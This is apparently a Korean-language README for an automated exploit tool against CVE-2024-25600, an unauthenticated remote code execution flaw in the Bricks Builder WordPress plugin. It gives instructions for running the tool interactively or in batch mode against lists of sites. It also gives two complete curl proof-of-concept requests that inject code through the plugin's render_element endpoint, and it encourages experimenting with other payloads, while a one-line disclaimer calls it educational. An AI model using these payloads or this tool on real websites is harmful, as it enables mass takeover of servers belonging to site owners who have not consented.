
CVE-2024-25600에 대한 자동화된 익스플로잇 도구로, Bricks Builder 플러그인을 사용하는 WordPress 사이트에서 인증되지 않은 원격 코드 실행을 가능하게 합니다. 명령 실행을 위한 대화형 및 배치 모드를 지원합니다.
이 도구 🛠️는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점 🕳️을 익스플로잇하기 위해 설계되었습니다. 이 취약점은 영향을 받는 웹사이트에서 인증되지 않은 원격 코드 실행을 허용합니다 💻. 이 도구는 nonce를 검색하고 특별히 조작된 요청을 전송하여 임의의 명령을 실행함으로써 익스플로잇 과정을 자동화합니다.
git clone을 사용하여 이 저장소를 로컬 머신 🖥️에 클론합니다.pip install -r requirements.txt를 사용하여 필요한 Python 라이브러리를 설치합니다.python exploit.py -u <URL>을 실행하여 대화형 모드를 시작합니다.python exploit.py -l <file_path>를 실행하여 나열된 사이트를 스캔 및 익스플로잇합니다.공개에서 제공된 기본 PoC는 다음과 같습니다:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
업데이트: 두 번째 PoC (더 신뢰할 수 있음)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
추가적인 페이로드가 더 나은 결과를 낼 가능성이 있습니다. 제 익스플로잇이나 개념 증명이 작동하지 않는 경우, 더 효과적인 해결책을 찾기 위해 대체 페이로드를 실험해 보시기 바랍니다.
[HOST]를 대상 웹사이트로, [NONCE]를 사이트에서 검색된 nonce 값으로 바꾸십시오.
CVE-2024-25600 취약점에 대한 자세한 내용은 Snicco.io의 상세 공개를 참조하십시오.
이 README에 제공된 정보는 교육 목적으로만 제공됩니다. 허가되지 않은 웹사이트나 네트워크 해킹은 불법이며 비윤리적입니다. 🚫
이 취약점을 발견하고 보고하여 커뮤니티에 정보와 도구를 제공하여 웹 애플리케이션 보안에 도움을 준 보안 연구자분들께 감사드립니다.